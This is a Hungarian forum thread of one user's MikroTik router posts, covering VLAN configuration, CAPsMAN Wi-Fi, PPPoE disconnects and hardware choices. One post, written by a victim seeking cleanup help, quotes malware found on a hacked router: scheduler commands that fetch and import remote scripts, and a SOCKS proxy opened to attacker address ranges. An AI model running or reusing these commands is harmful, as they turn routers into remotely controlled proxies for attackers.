- Honor 400 Pro - gép a képben
- Apple iPhone 16 Pro - rutinvizsga
- India felől közelít egy 7550 mAh-s Redmi
- Xiaomi 13T és 13T Pro - nincs tétlenkedés
- Milyen okostelefont vegyek?
- Telekom mobilszolgáltatások
- Xiaomi 15 - kicsi telefon nagy energiával
- Sony Xperia 1 V - kizárólag igényeseknek
- Samsung Galaxy S21 és S21+ - húszra akartak lapot húzni
- Samsung Galaxy S25 Ultra - titán keret, acélos teljesítmény
-
Mobilarena
Mikrotik routerekkel foglalkozó téma. Mikrotik router típusok, hardverek, router beállítások, programozás (scriptek írása), frissítés, és minden Mikrotik routerrel kapcsolatos beszélgetés helye.
Új hozzászólás Aktív témák
-
A_ScHuLcZ
addikt
Tudtok-e javasolni olyan oldalakat, ahová összetettebb Mikrotik-es mintakonfigurációk kerülnek feltöltésre, amikből lehet ihletet meríteni? A mostani itthoni konfigot néhány évvel ezelőtt alakítottam ki, használok vlan-okat, a tűzfal policy viszonylag komplex, de valószínűleg létezik jobb megoldás is, ezért szeretnék (elsősorban a tűzfalszabályokhoz) ötleteket meríteni ilyen mintakonfigurációkból vagy best practice-ekből.
Köszönöm!
-
A_ScHuLcZ
addikt
Sziasztok,
Digi a napokban nálunk is elvégezte az FTTB -> FTTH átállítást, eddig csak egy ethernet kábel (+ a koax a TV-hez) jött be a lakásba, most már optika fut be a végén egy ONT-vel.
Az ONT-t még a szerelés ideje alatt bridge-be rakattuk, nem variálunk.
A probléma az, hogy az átalakítás óta drasztikusan megnövekedtek a pppoe kapcsolat szakadásaink, egységnyi idő alatt nagyjából 100x annyi szakadás van, mint korábban, és (főleg HO idején) ez így nagyon nem jó. Az elmúlt 24 órában 9x szakadtunk le, a cserét megelőzően 3 hónap alatt nem történt ennyi szakadás, néztem a syslogon.
A logban periódikusan ennyit látok, és körülbelül 2-3 óránként ismétlődik:
18:28:22 pppoe,ppp,info pppoe-out1: terminating...
18:28:23 pppoe,ppp,info pppoe-out1: disconnected
18:28:23 pppoe,ppp,info pppoe-out1: initializing...
18:28:23 pppoe,ppp,info pppoe-out1: connecting...
18:28:24 pppoe,ppp,info pppoe-out1: terminating... - failed to authenticate ourselves to peer
18:28:24 pppoe,ppp,info pppoe-out1: disconnected
18:28:24 pppoe,ppp,info pppoe-out1: initializing...
18:28:24 pppoe,ppp,info pppoe-out1: connecting...
18:28:25 pppoe,ppp,info pppoe-out1: terminating... - failed to authenticate ourselves to peer
18:28:25 pppoe,ppp,info pppoe-out1: disconnected
18:28:26 pppoe,ppp,info pppoe-out1: initializing...
18:28:26 pppoe,ppp,info pppoe-out1: connecting...
18:28:27 pppoe,ppp,info pppoe-out1: authenticated
18:28:27 pppoe,ppp,info pppoe-out1: connectedÉrdekelne, hogy rajtam kívül más tapasztalt-e hasonlót, esetleg van-e ötletetek, hogy mit érdemes ellenőrizni/átállítani? (nem gondolom, hogy Mikrotik oldalon lesz a hiba, de szeretnék minden lehetőséget kizárni)
Köszönöm!
-
-
A_ScHuLcZ
addikt
cAP ac (RBcAPGi-5acD2nD) teljesítményével kapcsolatban mik a tapasztalatok?
Kb egy hete telepítettem le szülőknél a korábbi Linksys E2000 helyére. Egy hét elteltével rákérdeztem, hogy mik a tapasztalatok, de nincsenek elragadtatva tőle. Egy szinttel fentebb (emelet) és egy szinttel lentebb (pince) is csökkent a jelszint valamint a sebesség, a pincéből időnként nem is lehet csatlakozni, holott a kliens eszközök nem változtak. (csatlakozáshoz szükséges minimum jelszint nincs beállítva)
A cAP ac egyelőre az E2000 helyére került, de terveim között szerepel az áthelyezése, ha elkészül a kábelezés. Mivel igen előnytelen helyen van, lényegi javulást egyelőre nem vártam, az viszont határozottan meglep, hogy nem hozza az E2000 szintjét. A Linksys antennakarakterisztikáját nem ismerem, a MikroTik-et plafonra célszerű rakni, de minimum vízszintesen.
cAP ac:
Támogatott wireless szabványok: 802.11a/b/g/n/ac
Antennák száma: 2db 2.4G, 2db 5G
Antenna nyereség: 2.0 - 2.5 dBi
Max TX power: 20 dBmE2000:
Támogatott wireless szabványok: 802.11a/b/g/n
Antennák száma: 3
Antenna nyereség: 1.5 - 2.2 dBi
Max TX power: 17 dBmA kliensek között akad 1-2 korosabb darab, de az n szabványt már azok is bőven támogatják.
Beállítások a cAP ac-n:
Csatornaszélesség 2.4GHz-n: 20 Mhz
Csatornaszélesség 5GHz-n: 20 MHz
TX power: 20 dBmMindkét rádióhoz létrehoztam ugyanazt a wlan hálózatot ugyanazzal az SSID-val és titkosítással/hitelesítéssel, de azt látom, hogy minden kliens a 2,4GHz-t használja, ezen még majd javítani kell. Mivel kertvárosi környezet, a szomszédok eszközei sem lógnak be túlzottan a házba, -80dBm-nél erősebben nem látszik más hálózat.
Ezen fórumtéma alapján korábban igen sok probléma volt a cAP ac teljesítményével.
Tehát érdekelne a véleményetek/tapasztalatotok.
-
#6561
A_ScHuLcZ
addikt
adam900331
#6558
A_ScHuLcZ
addikt
válasz
adam900331
#6558
üzenetére
Az oktatóanyagban úgy mondták, hogy vagy interfészt kell állítani, vagy capsman ip címet, de akkor hozzáadtam mindkettőt. A bridge eredetileg none-ra volt állítva, tanácstalanságomban próbálkoztam vele.
A hiba egyébként az volt, hogy a datapath beállítás kimaradt (az oktatóvideóban nem volt benne, hogy azzal is kell foglalkozni), és így már szépen muzsikál., köszönöm!
A provision-os rész még nem akar menni, nem küldi le a cfg-t az ap-nak, hiába adom hozzá a rádiós interfészeket. Ezt majd később kinyomozom, egyelőre a cap interface-ket konfiguráltam a teszteléshez.
Kovindinka: ez jó ötlet, köszönöm!
-
A_ScHuLcZ
addikt
Sziasztok!
Egy soho wifi AP-t szeretnék kiváltani MikroTik AP-vel. A központi router szintén Mikrotik, ezért CapsMan-t szeretnék használni.
Most először konfigurálok Wi-Fi-t meg Capsman-t MikroTik-en, de valami nem jó, a wifi kliensek nem tudnak kommunikálni a routerrel, DHCP-n nem kapnak címet, illetve fixen beállított cím esetén sem megy a kommunikáció.
A cAP-on nem használok tűzfalat, egyetlen szabály sincs a firewall alatt.
Az AP egy cAP ac, és az eth1 portján keresztül van csatlakoztatva a routerre. eth2 porton vezetékes eszközzel tesztelve gyönyörűen megy a kapcsolat, a wlan interfészek felől van gond. (nekem bridge problémának tűnik)
CapsMan-ba két módon is próbáltam bevonni, de egyiknél sem működik: (Bridge résznél bridge vagy none kiválasztva)
A tűzfal hibát már kizártam, mert akkor sem megy, ha egyetlen szabály sincs a router tűzfalban.
Érdekesség: ha nem vonom be capsman-al a router alá, hanem külön az AP-n konfigurálok mindent, akkor hibátlanul működik.
Van ötletetek, hogy mi okozhat ilyet, illetve mit nézzek meg?
Köszönöm!
-
#6463
A_ScHuLcZ
addikt
Core2duo6600
#6462
A_ScHuLcZ
addikt
válasz
Core2duo6600
#6462
üzenetére
Tudom, ott van a listámban. (2.)
-
A_ScHuLcZ
addikt
Sziasztok!
Wi-Fi szempontból egyelőre még nincs gyakorlati tapasztalatom a MikroTik-kel.
Érdekelne az objektív (ha lehet ilyet kérni) véleményetek, hogy más gyártókhoz képest (pl Unify) milyen képességekkel és teljesítménnyel rendelkezik.
Típusokból konkrétan ezeket nézegettem:
wAP ac (RBwAPG-5HacT2HnD)
cAP ac (RBcAPGi-5acD2nD)
hAP ac2 (RBD52G-5HacD2HnD-TC)Specifikációk alapján a hAP ac2 rendelkezik a legjobb wireless képességekkel, de nem kifejezetten alkalmas falra vagy plafonra szereléshez. (nem oda való, nem esztétikus)
TP-Link, D-link és hasonló gyártóktól komolyabb megoldást keresek, normális monitorozhatóságot szeretnék, de nem kell enterprise szint.
A router MikroTik (hEX), ezért gondoltam wifi részben is arra (a capsman-os megoldásra egyébként is kíváncsi vagyok)
A felhasználók száma 10 alatt lesz, és fontos, hogy mindkét frekvencia sáv képes legyen a userek kiszolgálására azonos időben.Egy wAP ac-t kaptam kölcsön tesztelésre, az alapján egy AP-val kb 85%-ban lefedhető a terület. Ha kevés lesz, akkor utólag be fogunk szerezni még egy AP-t, tehát maximum 2db lesz.
Köszönöm!
-
#6416
A_ScHuLcZ
addikt
Core2duo6600
#6415
A_ScHuLcZ
addikt
válasz
Core2duo6600
#6415
üzenetére
Nincs a lakásban Digi-s eszköz, UTP jön be a lépcsőházi switchből. (panel)
Ez egyértelműen DHCP kérés, de nem tőlünk jön. Tippre valaki rosszul állította be a routerét a lépcsőházban. (DHCP client mód)
Engem az izgat, hogy én, mint felhasználó vajon miért látom ezt?
-
A_ScHuLcZ
addikt
Ilyennel van teli a log, valakinek nincs rendesen beállítva a routere:
(ether1 a szolgáltató felé menő interface)22:09:27 firewall,info input: in:ether1 out
unknown 0), src-mac 60:45:cb:5c:00:c8, proto UDP, 0.0.0.0:68->255.255.255.255:67, len 328
22:09:31 firewall,info input: in:ether1 outunknown 0), src-mac 60:45:cb:5c:00:c8, proto UDP, 0.0.0.0:68->255.255.255.255:67, len 328
22:09:54 firewall,info input: in:ether1 outunknown 0), src-mac 60:45:cb:5c:00:c8, proto UDP, 0.0.0.0:68->255.255.255.255:67, len 328
22:09:57 firewall,info input: in:ether1 outunknown 0), src-mac 60:45:cb:5c:00:c8, proto UDP, 0.0.0.0:68->255.255.255.255:67, len 328
22:10:00 firewall,info input: in:ether1 outunknown 0), src-mac 60:45:cb:5c:00:c8, proto UDP, 0.0.0.0:68->255.255.255.255:67, len 328
22:10:23 firewall,info input: in:ether1 outunknown 0), src-mac 60:45:cb:5c:00:c8, proto UDP, 0.0.0.0:68->255.255.255.255:67, len 328
22:10:26 firewall,info input: in:ether1 outunknown 0), src-mac 60:45:cb:5c:00:c8, proto UDP, 0.0.0.0:68->255.255.255.255:67, len 328
22:10:29 firewall,info input: in:ether1 outunknown 0), src-mac 60:45:cb:5c:00:c8, proto UDP, 0.0.0.0:68->255.255.255.255:67, len 328
22:10:53 firewall,info input: in:ether1 outunknown 0), src-mac 60:45:cb:5c:00:c8, proto UDP, 0.0.0.0:68->255.255.255.255:67, len 328
22:10:56 firewall,info input: in:ether1 outunknown 0), src-mac 60:45:cb:5c:00:c8, proto UDP, 0.0.0.0:68->255.255.255.255:67, len 328
22:10:59 firewall,info input: in:ether1 outunknown 0), src-mac 60:45:cb:5c:00:c8, proto UDP, 0.0.0.0:68->255.255.255.255:67, len 328Mondjuk érdekesnek tartom, hogy a szolgáltatói eszközön nem vagyunk elszeparálva egymástól..
(Digi) -
A_ScHuLcZ
addikt
válasz
#42556672
#6383
üzenetére
És igazad lett!
Noha logikusan egyik default tűzfalszabály sem kéne, hogy megfogja, azért próbaképpen kitöröltem mindet (a fastrack dummy-n kívül), és láss csodát, azonnal működik. (mondjuk MAC alapon nem találja meg, mint neighbourt, az kicsit érdekes)
Akkor így már megoldom szerintem, köszönöm a validálást és a rávezetést.
Core2duo6600: MS Visio
Update: már rá is jöttem mi fogja meg, és végiggondolva igaza van, a vlan interfacek nem lettek hozzáadva a "LAN" néven futó interface listához...
Ez a sor volt a ludas:
add action=drop chain=input comment="defconf: drop all not coming from LAN" \
in-interface-list=!LAN -
A_ScHuLcZ
addikt
válasz
#42556672
#6374
üzenetére
Bocs, délután nem voltam gépközelben.
Összedobtam egy gyors tervet, a végére ezt szeretném elérni. Akkor fogom betenni a hEX helyére az RB450-t, ha sikerült nagyjából működőképesre bírni az ábrán látható elképzelést.
Az ether2 a jelenlegi hEX-es konfigurációban is trunk, és a natív 1-esen kívül 2 VLAN-t visz át taggelve (client, guest). Jelenleg más VLAN ID-kat használok, ezt nyilván hozzá kell majd igazítani az új konfighoz az AP-n.
Az ether3 porton egy otthoni szerver foglal helyet, ami egyben NAS is, ezen virtuális gépeket szeretnék futtatni, amik másik VLAN-ból fognak IP-t kapni, ezért kell a trunk.
A hálózatok közötti átjárhatóságot a tűzfal fogja szabályozni, ennek beállítását még nem csináltam meg.
Az RB450 jelenlegi konfigja, aminél elvesztettem az elérést a router mgmt-jével. Ha kikapcsolom a bridge alatt a vlan-filteringet, akkor ismét elérem MAC alapon. ether4-re vagy ether5-re csatlakoztatott PC megkapja a helyes IP címet a megfelelő VLAN-ból, és a router összes VLAN Interface-e pingethető.
(a későbbiekben tervezek bevezetni egy DMZ zónát, de ennek szükségességét még mérlegelem)
-
A_ScHuLcZ
addikt
Minden port vlan-ba fog kerülni, mindenkinek a saját vlan-beli vlan interface lesz a gateway-e, olyan kliens nem lesz, aki simán a bridge-be kerül vlan nélkül. A példában egyelőre az ether2-t és ether3-t és egyetlen vlan-t, konfiguráltam, hiszen amíg ez nem megy, addig felesleges tovább haladni.
Ha sikerül összelőni, akkor 3 vlan-om lesz az alábbi felosztásban:
ether1: ISP
ether2: trunk (vlan 2 tagged, vlan 3 tagged, vlan 4 tagged, vlan 1 untagged)
ether3: vlan 2 untagged
ether4: vlan 3 untagged
ether5: vlan 4 untagged
(az ether2-3-4-5 ugyanazon bridge tagjai)ekkold: ott hozzáadtam a bridge alá, ahogy az oktatóanyagban is található. Természetesen oda fel kell majd venni a többit is, de amíg egy nem működik, addig feleslegesnek éreztem.
Core2Duo6600: MAC alapon se megy, miután bekapcsolom a vlan-filteringet a bridge alatt. Ha kikapcsolom, ismét elérem a MAC cím segítségével. ether3-ba volt a gép, ott a vlan 2 untagged módban jön ki, és tudtam is pingetni a router vlan interfészét (192.168.2.1) a vlan-filtering bekapcsolása után, tehát ez a rész látszólag jól működött.
A jelenlegi eszköznél csak 2 vlan-t használok, de ezzel a módszerrel anno gond nélkül sikerült beállítani mindent, a vlan-ok közötti átjárást a tűzfal szabályozza.
-
A_ScHuLcZ
addikt
Sziasztok!
Ha már új router, akkor gondoltam újra felépítem a konfigot, és egyúttal rendbe is teszem.
RB450Gx4
RouterOS 6.43.8Azonban már az elején elakadtam, mert a vlan-ozást nem sikerül összehozni, pedig a hEX-emen gyönyörűen működik ezzel a módszerrel jelen pillanatban is.
Jelenleg csak 1 vlan-al kísérletezem, és a default konfigot használom. A célom az, hogy legyen legalább egy olyan portom, ahol trunk-ot hozok ki a routerből, mert a túloldali eszköz azokkal dolgozik. A többi portot egyelőre untagged módban szeretném hagyni, de nem ugyanabba a vlan-ba fognak kerülni.
A példában egyelőre az ether2 és ether3 portokkal kísérleteztem, ether2 lenne a trunk, ether3 pedig untagged a 2-es vlan-ban. A beállításokat a korábban tanult módon (mindenamimikrotik online tanfolyam) elvégeztem, mégsem úgy működik, ahogy elvárható lenne.
A jelenség: ha a bridge alatt engedélyezem a vlan-filtering opciót, akkor elveszítem a kapcsolatot az eszközzel. Illetve csak részben, mert a ping-re válaszol, de a mgmt felületre semmilyen módszerrel nem tudok belépni (se ssh, se winbox, se web).
A konfig lényeges részei:
/interface bridge
add admin-mac=xx:xx:xx:xx:xx:xx auto-mac=no name=bridge vlan-filtering=yes
/interface vlan
add interface=bridge name=vlan2 vlan-id=2/interface bridge port
add bridge=bridge interface=ether2
add bridge=bridge interface=ether3 pvid=2
add bridge=bridge interface=ether4
add bridge=bridge interface=ether5/interface bridge vlan
add bridge=bridge tagged=ether2,bridge untagged=ether3 vlan-ids=2/ip address
add address=192.168.2.1/24 comment=defconf interface=vlan2 network=192.168.2.0A teljes konfig innen elérhető.
(csak az idetartozó részt módosítottam, minden más a gyári default állapoton van)Lehet, hogy csak fáradt vagyok, és nem veszek észre valamit, de nem jövök rá, hogy miért nem úgy viselkedik, ahogy kellene. (config reset is volt már többször)
Ugyanezzel a módszerrel oldottam meg a hEX-en is (igaz ott nem megy a hw offload, CPU-ból tolja az egészet), és gyönyörűen teszi a dolgát.
-
A_ScHuLcZ
addikt
Köszönöm a javaslatot, megrendeltem és elhoztam az utolsó darabot iPon-ból. (a rendelésem leadása után elérhetetlenné vált náluk a termék)
Hozzá való házat sajnos nem árultak, de ez már a legkevesebb, beszerzem máshonnan.Itt pihen az asztalon, ha lesz egy kis időm, akkor átültetem rá a konfigot, a hEX pedig megy szülőknek.
(a dedikált konzol portért nagy ++, a hEX-ről nagyon hiányoltam 1-2 alkalommal.)
-
A_ScHuLcZ
addikt
Sziasztok!
Ősöknek szeretnék új routert venni, és arra gondoltam, hogy oda is a jól bevált hEX (RB750Gr3) kerülhetne, 100/100-as nethez több, mint elég.
Azonban nemrég megjelent a hEX S (RB760iGS), és úgy látom, hogy az SFP porton és a PoE out-on kívül semmiben nem különbözik a kettő.
Árban van pár guriga különbség, ezért érdeklődöm, hogy érdemes lehet még megvenni a 750-est, vagy válasszam inkább a 760-t? Az SFP portra biztos nem lesz szükség, és valószínű a PoE-ra sem, mert nem MikroTik AP kerül a végére. (tudtommal nem a szabványos 802.3af/at tápot adja le)
-
#5716
A_ScHuLcZ
addikt
Core2duo6600
#5688
A_ScHuLcZ
addikt
válasz
Core2duo6600
#5688
üzenetére
A linkelt leírás elég szájbarágós, kb lehetetlen elrontani, de mégsem sikerült megcsinálni, mert a router nem jelenik meg a Netinstall programban.
Mindent pontosan úgy csináltam, ahogy a nagy könyvben meg van írva, kapott egy konfig resetet, a gépemet a 192.168.88.2-es ip-re, a netinstall-t pedig a 192.168.88.3-ra állítottam.
Próbáltam a reset gombos és a try-ethernet-once-then-nand módszert is, ugyanis winboxból reset óta be tudok lépni. A winbox belépés akkor megy, ha az eth2-5 portok valamelyikére csatlakozom (ugyebár defaultban ezek a bridge tagjai), az eth1-en nem, azt gyárilag wan porttá konfigurálja.
Ezt csak azért írtam le, mert minden leírás az eth1-et említi, mint etherboot port.(azt is próbáltam hogy eth5-n keresztül winboxal belépve kiadtam a /system routerboard settings set boot-device=try-ethernet-once-then-nand parancsot, majd átkötöttem magam az eth1-re, és úgy bootoltam meg, de semmi)
Ugyan áteresztettem a netinstall progit a tűzfalon, de azért megnéztem kikapcsolt tűzfallal is, természetesen a helyzet változatlan.
Tanácstalanságom miatt írok most..
-
A_ScHuLcZ
addikt
Attól tartok nem fogom megúszni a netinstallt és az újrakonfigolást.
Délután még mozgattam távolról, most viszont se lokál hálóról, se arról az IP-ről nem tudok belépni, ahova szűkítve van a service elérése.
Lokál háló esetén: mindegy milyen adatokat írok be, a winbox Logging in-nél megáll, ssh-t pedig egyből visszadobja.
A megfelelő távoli címről próbálkozva winbox-ban Could not connect üzenet jön szembe, ssh pedig timeoutol.
-
A_ScHuLcZ
addikt
válasz
bambano
#5687
üzenetére
Megtaláltam a kis rohadékot, ide fészkelte be magát:
Ha a logban nem tapasztalok semmi furát, akkor bízhatok benne, hogy sikerült kiirtani?
A flash is teljesen üres:
Nem ártana tudni hogyan jutott be, hogy legközelebb ne forduljon elő, de erre gondolom keresztet vethetek logok nélkül. (a régi szoftver sérülékenységének kihasználására tippelek)
-
A_ScHuLcZ
addikt
Sziasztok!
Feltételezhetően feltört eszközt hogyan tudok megtisztítani? Belépéskor a log tele volt hibaüzenetekkel, és volt egy script, aminek a forrása ismeretlen.
Log bejegyzés, ami ismétlődött:
script error: expected end of command (line 3 column 86)A scriptben ez állt:
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=httpA letöltött mikrotik.php fájlt töröltem, de azért letöltöttem pc-re, és belenéztem, ilyen bejegyzésekkel volt tele:
/system scheduler remove [find name !="U3" && name !="U4"]
/ip socks set enabled=yes port=44550
{ :local countRules [/ip socks access print count-only]; :for i from 0 to $countRules-1 step=1 do= {/ip socks access remove $i} }
/ip socks access add src-address=5.188.42.224/29 action=allow
/ip socks access add src-address=5.188.42.232/30 action=allow
/ip socks access add src-address=5.188.42.236/31 action=allow
/ip socks access add src-address=5.188.42.238/32 action=allow
/ip socks access add src-address=5.188.42.96/29 action=allow
/ip socks access add src-address=5.188.42.104/30 action=allow
/ip socks access add src-address=5.188.42.108/31 action=allow
/ip socks access add src-address=5.188.42.110/32 action=allow
/ip socks access add src-address=5.189.235.80/30 action=allow
/ip socks access add src-address=5.189.235.84/31 action=allow
/ip socks access add src-address=5.189.235.86/32 action=allow
/ip socks access add src-address=192.243.53.14/32 action=allow
/ip socks access add src-address=192.243.53.15/32 action=allow
/ip socks access add src-address=192.243.53.31/32 action=allow
/ip socks access add src-address=46.20.39.117/32 action=allow
/ip socks access add src-address=78.46.114.23/32 action=allow
/ip socks access add src-address=213.202.230.152/32 action=allow
/ip socks access add src-address=31.184.224.107/32 action=allow
/ip socks access add src-address=31.184.224.108/32 action=allow
/ip socks access add src-address=31.184.224.109/32 action=allow
/ip socks access add src-address=5.188.42.109/32 action=allow
/ip socks access add src-address=0.0.0.0/0 action=denyEddig elvégzett műveletek:
- idegen script és job törlése
- winbox-on kívül minden service tiltása, winbox is kizárólag egy távoli ip-ről engedélyezve
- ip socks kikapcsolása
- user pw csere
- fw és RouterOS frissítés 6.43-ra, majd rebootMár nem látok idegen scriptet, de a log-ban a fenti bejegyzés időnként továbbra is megjelenik. A mikrotik.php fájl időnként továbbra is letöltődik, továbbá 5 percenként egy 7xe7zt46hb08 nevű fájl is letöltődik, aminek a tartalma az alábbi:
:do { /system scheduler set U3 name="U5" on-event="/tool fetch url=http://ciskotik.com/poll/4e57ce74-3959-441c-be72-2ead3b6d0e57 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U3 not found"}:do { /system scheduler set U4 name="U5" on-event="/tool fetch url=http://ciskotik.com/poll/4e57ce74-3959-441c-be72-2ead3b6d0e57 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U4 not found"}
Mit tudok tenni? (nem látok se script-et, se job-ot, más módszerrel csinálja)
-
A_ScHuLcZ
addikt
válasz
feel2006
#4220
üzenetére
Köszönöm!
Azt nem is figyeltem, hogy az AP-hoz gyárilag ilyen "PoE-s" betápot adnak, az teljesen megfelelő nekem. Pár méterrel lesz odébb rakva, és jó minőségű kábelem is van itthon, annyit csak átvisz.
@Core2duo6600: Nézegettem a Digi oldalát, nekem elegendő lehet az 500/200 is, mert a feltöltés a legnagyobb csomagnál sem haladja meg a 200-at, nekem pedig az az elsődleges szempont. (a címünkön mindegyik elérhető)
-
#4218
A_ScHuLcZ
addikt
Core2duo6600
#4217
A_ScHuLcZ
addikt
válasz
Core2duo6600
#4217
üzenetére
Hát a mostani netet bármelyik kiszolgálja maximálisan, ebben biztos vagyok, de próbálok pár évre előre tervezni.
Jelenleg 100/100 pppoe (digi), de szeretnék nagyobbra előfizetni (akár 1000-es), de eddig felesleges lett volna.
-
A_ScHuLcZ
addikt
válasz
Ablakos
#4215
üzenetére
Hmm, azt feltételeztem, hogy a hEX és a hEX PoE architektúrában és specifikációkban megegyezik, mindössze a PoE képesség a kettő közti különbség, de most nézem, hogy nagyon nem:
- 128 vs 256MB RAM
- 1 vs 2 magos CPU
- 800 vs 880MhzA PoE-s változat ugyan tud fogadni optikát, de arra előreláthatólag itthon nem lesz szükségem.
Akkor lehet mégis a sima hEX lesz a nyerő.
-
A_ScHuLcZ
addikt
válasz
feel2006
#4170
üzenetére
A sebesség értékeket nagyon várjuk!
Igen, én is erre a kombóra jutottam. Igazság szerint nem rossz az, ha két külön helyre kerül a router és az AP, mert a router helye a kábelezés végett nagyjából fix, viszont az a hely AP szempontjából nagyon nem ideális. Úgy tudom össze lehet integrálni a két eszközt, a router amolyan kontroller funkciót képes ellátni, ez valóban így van?
Ha Router+AP kombót veszek, akkor az AP-t mindenképpen PoE-n keresztül szeretném megtáplálni, ezért lehet érdemesebb egy hEX PoE-t választani, nem? (valakitől hallottam, hogy a MikroTik-nél vigyázzak a PoE-vel, mert náluk a PoE az nem mindig a szabványos 802.3af/at-t jelenti, mint a legtöbb gyártónál)
A téma érdekel, és ebben a szakmában dolgozom, de konkrétan a MikroTikkel még nincs tapasztalatom, enterprise eszközöket szoktunk konfigurálni.
-
A_ScHuLcZ
addikt
válasz
feel2006
#4147
üzenetére
Ez engem is érdekelne, ha valaki kimérte már, ne tartsa magában.
Routert kell cserélnem mihamarabb, és nagyon gondolkozom, hogy belevágjak-e a MikroTik világába, egyszer konfigoltam MikroTik eszközt, és tetszett, hogy mennyi lehetőséget rejt magában.
B verzió, hogy veszek valami komolyabb ASUS-t, amire fel lehet tenni custom fw-t (pl Tomato, most az van).
MikroTik-et szívesebben vennék, de nem találok olyat, ami egy dobozon belül minden igénynek megfelel:
- 500mbit-es netet áthozza (WAN-->LAN)
- gigabites portok, minimum 4db, ha több van, az előny
- dual band ac wifi erős adóvalhEx + valamelyik AP lehet megoldás, vagy építés, utóbbit még nem vizsgáltam meg.
unknown 0), src-mac 60:45:cb:5c:00:c8, proto UDP, 0.0.0.0:68->255.255.255.255:67, len 328
(Digi)
Új hozzászólás Aktív témák
Hirdetés
- ELADÓ TELJES GAMER SETUP!
- Lenovo ThinkPad T14 Gen 3:i5 1250P(12mag),16GB,512GB,14"matt TOUCH,vil.HU bill,Lenovo gari 2026.6.25
- Amazfit Gtr 3 Pro okosóra dobozával újszerű állapotban
- i3-8100 + ASUS H310M alaplap + 8GB RAM egyben (félkonfig)
- Asztali PC , R5 5500 , RX 6700 XT , 32GB RAM , 512GB NVME , 1TB HDD
- REFURBISHED - HP USB-C Universal Dock G1 docking station (DisplayLink)
- TELJES KÖRŰ IT BESZERZÉS
- Lenovo Yoga Pro 9 (16IMH9) - Intel Core Ultra 9 185H, RTX 4060, 32GB, érintős ELKELT
- Több Lenovo Thinkpad x1 carbon gen 4 / 5 / 6 / 7 X1 Yoga gen3 6-9. gen i7, i5 procik
- BESZÁMÍTÁS! Apple MacBook Pro 14 M4 Pro 24GB RAM 512GB SSD garanciával hibátlan működéssel
Állásajánlatok
Cég: Promenade Publishing House Kft.
Város: Budapest
Cég: PC Trade Systems Kft.
Város: Szeged